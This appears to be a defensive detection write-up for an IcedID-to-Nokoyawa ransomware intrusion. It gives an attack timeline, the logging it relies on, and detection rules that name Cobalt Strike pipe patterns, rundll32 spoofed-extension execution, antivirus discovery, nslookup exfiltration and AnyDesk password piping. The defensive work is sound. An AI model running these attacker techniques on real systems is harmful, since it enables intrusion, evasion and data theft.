IcedID/Nokoyawa Ransomware
Original research credit: TheDFIReport
TL;DR Summary
- In late February 2023, threat actors rode a wave of initial access using Microsoft OneNote files. In this case, we observed a threat actor deliver IcedID using this method.
- After loading IcedID and establishing persistence, there was no further actions, other than beaconing for over 30 days.
- The threat actor used Cobalt Strike and AnyDesk to target a file server and a backup server.
- The threat actor used FileZilla to exfiltrate data from the network before deploying Nokoyawa ransomware.
Required Logging
| Event ID | Channel | Details |
| 4688 / 1 | Security, Sysmon | New process creation. |
| 17 | Sysmon | Pipe creation event. |
| 4698 | Security | New Task Creation. |
Detection Rules
| Rule Name | Description | Detection Logic |
| Powershell Invoking Webrequest | Detects usage of powershell’s “Invoke-webrequest” | Product: Windows Category: process_creation Event ID: 4688 / 1 (sysmon) Command|ContainsAll: – “invoke” – “webrequest” |
| Cobaltstrike Pipe Naming Pattern | Detecting the default naming pattern of Cobaltstrike’s pipe creation attempts. | Product: Windows Category: pipe_creation Event ID: 17 (sysmon) Pipename|ContainsAny: – \postex_ – \postex_ssh_ – \status_ – \msagent_ – \MSSE- – \-server |
| IcedID Task Creation Pattern | Detects scheduled task creation arguments that are referenced to IcedID | Product: Windows Category: task_creation Event ID: 4698 ExecArguments|ContainsAll: – “Cadiak.dll” – “license.dat” |
| Execute DLL with spoofed extension | Execute DLL with spoofed extension | Product: Windows Category: task_creation Event ID: 4688 Command|ContainsAny: -‘rundll32.html,DllRegisterServer’ – ‘rundll32.htm,DllRegisterServer’ – ‘rundll32.txt,DllRegisterServer’ – ‘rundll32.png,DllRegisterServer’ – ‘rundll32.jpeg,DllRegisterServer’ – ‘rundll32.jpg,DllRegisterServer’ – ‘rundll32 c:\programdata\.pdf’ – ‘rundll32 c:\programdata\.txt’ – ‘rundll32 c:\programdata\.jpg’ – ‘rundll32 c:\programdata\.png’ – ‘rundll32 c:\programdata\.jpeg’ – ‘rundll32 c:\users\public\.pdf’ – ‘rundll32 c:\users\public\.txt’ – ‘rundll32 c:\users\public\.jpg’ – ‘rundll32 c:\users\public\.png’ – ‘rundll32 c:\users\public\.jpeg’ – ‘rundll32\.pdf’ – ‘rundll32\.txt’ – ‘rundll32\.jpg’ – ‘rundll32\.png’ – ‘rundll32\.jpeg’ – ‘rundll32\.dat’ |
| AV Discovery | Detects coomand line used to discover the AV products on the machine | Product: Windows Category: task_creation Event ID: 4688 Command|ContainsAll: – “/node” – “SecurityCenter2” – “antivirusproduct” – “get” |
| Potential DNS Exfiltration via nslookup | This rule triggers when the nslookup command is executed an excessive amount of times from the same machine. This behaviour could indicate a malicious actor attempting to gather information about the network to exfiltrate at a later date. | Product: Windows Category: task_creation Event ID: 4688 Command|ContainsAny: – “nslookup” AND when at least 5 events are seen with the same Computer in 5 minutes (change accordingly) |
| AnyDesk Piped Password Via CLI | Detects piping the password to an anydesk instance via CMD and the ‘–set-password’ flag. | Product: Windows Category: task_creation Event ID: 4688 Command|ContainsAll: – “/c” – “echo” – “.exe –set-password” |